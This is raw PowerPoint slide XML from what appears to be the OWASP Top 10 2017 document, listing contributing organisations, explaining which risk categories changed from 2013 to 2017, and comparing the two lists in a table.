                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>AsTech Consulting</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Branding Brand</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Contrast Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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21145">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>EdgeScan</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId26"/>
                        </a:rPr>
                        <a:t>iBLISS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId27"/>
                        </a:rPr>
                        <a:t>Minded Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>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914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId28"/>
                        </a:rPr>
                        <a:t>Paladion Networks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId29"/>
                        </a:rPr>
                        <a:t>Sonatype</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Vantage Point</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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171450" indent="-171450">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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92177317"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="4739640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>What Changed From 2013 to 2017?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="4343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t>The threat landscape for applications and APIs constantly changes. Key factors in this evolution are the rapid adoption of new technologies (including cloud, containers, and APIs), the acceleration and automation of software development processes like Agile and DevOps, the explosion of third-party libraries and frameworks, and advances made by attackers. These factors frequently make applications and APIs more difficult to analyze, and can significantly change the threat landscape. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>To keep pace, we </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>periodically </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>update the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP Top 10. In this 2017 release, we made the following changes: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600" kern="1200" baseline="0" dirty="0" smtClean="0"/>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000" b="0" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>We merged 2013-A4: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Insecure Direct Object References and 2013-A7:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Missing Function Level Access Control back</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> into 2017-A4: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Broken Access Control.</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sz="600" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Courier New" charset="0"/>
                        <a:buChar char="o"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>In 2007, we split Broken Access Control into these two categories to bring more attention to each half of the access control problem (data and functionality). We no longer feel that is necessary so we merged them back together.</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000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>We a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>dded 2017-A7: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Insufficient Attack Protection:</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sz="600" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>For years, we’ve considered adding insufficient defenses against automated attacks. Based on the data call, we see that the majority of applications and APIs lack basic capabilities to detect, prevent, and respond to both manual and automated attacks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Application and API owners also need to be able to deploy patches quickly to protect against attacks.</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000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>We </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>added 2017-A10: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Underprotected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> APIs:</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sz="600" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Modern applications and APIs often involve rich client applications, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities. We include it here to help organizations focus on this major emerging exposure.</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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We dropped: 2013-A10: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Redirects and Forwards:</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sz="600" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="–"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>In 2010, we added this category to raise awareness of this problem. However, the data shows that this issue isn’t as prevalent as expected. So after being in the last two releases of the Top 10, this time it didn’t make the cut.</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baseline="0" dirty="0" smtClean="0"/>
                        <a:t>NOTE: The T10 is organized around major risk areas, and they are not intended to be airtight, non-overlapping, or a strict taxonomy. Some of them are organized around the attacker, some the vulnerability, some the defense, and some the asset. Organizations should consider establishing initiatives to stamp out these issues.</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="73" name="Table 72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1656006554"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5943600"/>
          <a:ext cx="6858000" cy="3200397"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="360637">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2013 (Previous)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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3C752E"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(New)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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A1647"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2839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smtClean="0"/>
                        <a:t>A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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smtClean="0"/>
                        <a:t>A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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r>
              <a:tr h="2839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t>A2 – Broken Authentication and Session Management</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A2 – Broken Authentication and Session Management</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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t>A3 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A3 – Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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t>A4 – Insecure Direct Object References -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Merged with A7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A4 – Broken Access Control (Original category in 2003/2004</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2839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t>A5 – Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A5 – Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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t>A6 – Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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t>A6 – Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
              <a:tr h="2839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t>A7 – Missing Function </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Level</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> Access Control -</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Merged with A4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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tx1"/>
